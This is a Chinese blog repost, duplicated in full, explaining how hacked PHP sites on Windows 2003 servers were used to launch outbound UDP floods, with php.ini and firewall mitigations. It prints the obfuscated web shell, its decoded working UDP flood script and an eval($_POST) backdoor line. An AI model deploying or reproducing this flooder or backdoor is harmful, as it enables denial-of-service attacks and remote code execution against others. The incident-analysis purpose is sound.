win2003遭受udp攻击导致带宽占用很大
程序员文章站
2022-04-25 11:55:59
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的, 以下为转帖: 关于近期一些服务...
后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的,
以下为转帖:
关于近期一些服务器遭受udp攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
dznhkqniaadv85hpdg4ttgfidrydcrboooevg5gqrpbovh77crmz+f3vp99dofz6bbek/sjoqkntsscpnjkhtf2xw
6zp4cdvibfuzlq1xhqchhdf3z39ldpx33lk9xm78duochekfilo46tqg21dieg+bctz9qw/gd+lmgtthrsmdsemlb
vkzvpt3s0ums3mdx0wog2ny+gb2l+fufdyzpu6gnjxaysarbsanhimzjbuoqzuy0+lv4h6gztdx9lxke9l29swfgy
ibuttusopqiri7nfbpdmw0t5ecfwjzmfze2xqermtmlvpoqny436bfrdxk10kyofgawn7s3geqb7rdv7wkxibhzu4
wyw0lxsmytdcdwk3tojduh1f8cyvsgyuaejeli23cslonsqdsu3gx60zllm5xq9jqhbyq949qvb2us1dqsagpyvfg
3ihy4txaembf2mkky9stkjuddhxfmi3z+ewa7owlgvrxeb5qz4ae2drflaymo6litzoul1gxmlavoldw8/omb7ci1
3dlk1y9xdddgga4onebz0vmx8aswapy6q2jkpo0i8kg1qox7evpgejnsolyzziw8apdl+v0/0fstph3qqi+1qqucw
xizh1aatmkjitxw5rmz4wyrgmokcutlvau2dle3a85a0gjjqwogx5anhiilqpplj9mdpdqsw9tybo4whccmqjfgou
sj+rrt+2ok8rbc/ovd47v+j02tay9fkmtp2u8huuo1ezp5f3xcmyl6ftjakw+h+r1ljn0m0nys/txcpey1tyol7aw
e8dp5ygq1vxafoekqd6egdwswmebzsruejiqerbtgx0orpw2cnkoxfs/kdiqauxc26qytlsbeaxiawleq784jjwnu
bv2kpiarl4bmvgnxv+9qwm8j1fvnr1yga9lvsf1hm63tspymtn4k1qfeglvowe93kyhxgbrpnxicopk3oqbb6dl3c
hsj4owqk4foic2k4mq3tky/vfv78/pz///pr+gfd/')));
经过n次解密后的代码:
<?php
$packets = 0;
$ip = $_get[\'ip\'];
$rand = $_get[\'port\'];
set_time_limit(0);
ignore_user_abort(false);
$exec_time = $_get[\'time\'];
$time = time();
print \"flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"x\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mb) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_post[ddos])?>
baidu了一下工作原理:
先把你代码放到一个正常的网页中.
通过url传递ip和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为off
allow_url_fopen = off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启iis
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.
以下为转帖:
关于近期一些服务器遭受udp攻击的说明
近来我有一两台服务器显示经常受到udp攻击
导致服务器带宽占用到100%,用华盾查流量占用也无法查到具体是哪个站被攻击了,起初以为是cc攻击,因为停止了iis带宽就为0了,其实不然,都是部分用户被入侵导致的
下面我想说一下被入侵的原理
用户程序中的一个php页面的原代码:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
dznhkqniaadv85hpdg4ttgfidrydcrboooevg5gqrpbovh77crmz+f3vp99dofz6bbek/sjoqkntsscpnjkhtf2xw
6zp4cdvibfuzlq1xhqchhdf3z39ldpx33lk9xm78duochekfilo46tqg21dieg+bctz9qw/gd+lmgtthrsmdsemlb
vkzvpt3s0ums3mdx0wog2ny+gb2l+fufdyzpu6gnjxaysarbsanhimzjbuoqzuy0+lv4h6gztdx9lxke9l29swfgy
ibuttusopqiri7nfbpdmw0t5ecfwjzmfze2xqermtmlvpoqny436bfrdxk10kyofgawn7s3geqb7rdv7wkxibhzu4
wyw0lxsmytdcdwk3tojduh1f8cyvsgyuaejeli23cslonsqdsu3gx60zllm5xq9jqhbyq949qvb2us1dqsagpyvfg
3ihy4txaembf2mkky9stkjuddhxfmi3z+ewa7owlgvrxeb5qz4ae2drflaymo6litzoul1gxmlavoldw8/omb7ci1
3dlk1y9xdddgga4onebz0vmx8aswapy6q2jkpo0i8kg1qox7evpgejnsolyzziw8apdl+v0/0fstph3qqi+1qqucw
xizh1aatmkjitxw5rmz4wyrgmokcutlvau2dle3a85a0gjjqwogx5anhiilqpplj9mdpdqsw9tybo4whccmqjfgou
sj+rrt+2ok8rbc/ovd47v+j02tay9fkmtp2u8huuo1ezp5f3xcmyl6ftjakw+h+r1ljn0m0nys/txcpey1tyol7aw
e8dp5ygq1vxafoekqd6egdwswmebzsruejiqerbtgx0orpw2cnkoxfs/kdiqauxc26qytlsbeaxiawleq784jjwnu
bv2kpiarl4bmvgnxv+9qwm8j1fvnr1yga9lvsf1hm63tspymtn4k1qfeglvowe93kyhxgbrpnxicopk3oqbb6dl3c
hsj4owqk4foic2k4mq3tky/vfv78/pz///pr+gfd/')));
经过n次解密后的代码:
复制代码 代码如下:
<?php
$packets = 0;
$ip = $_get[\'ip\'];
$rand = $_get[\'port\'];
set_time_limit(0);
ignore_user_abort(false);
$exec_time = $_get[\'time\'];
$time = time();
print \"flooded: $ip on port $rand <br><br>\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"x\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mb) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
<?php eval($_post[ddos])?>
baidu了一下工作原理:
先把你代码放到一个正常的网页中.
通过url传递ip和端口以udp的方式打开.传递文件到服务器写出.
这样服务器就中招了.
也就是服务器显示udp攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间
解决方案:
在php.ini中限制php用网络。
在php.ini里设其值为off
allow_url_fopen = off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
然后重启iis
我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.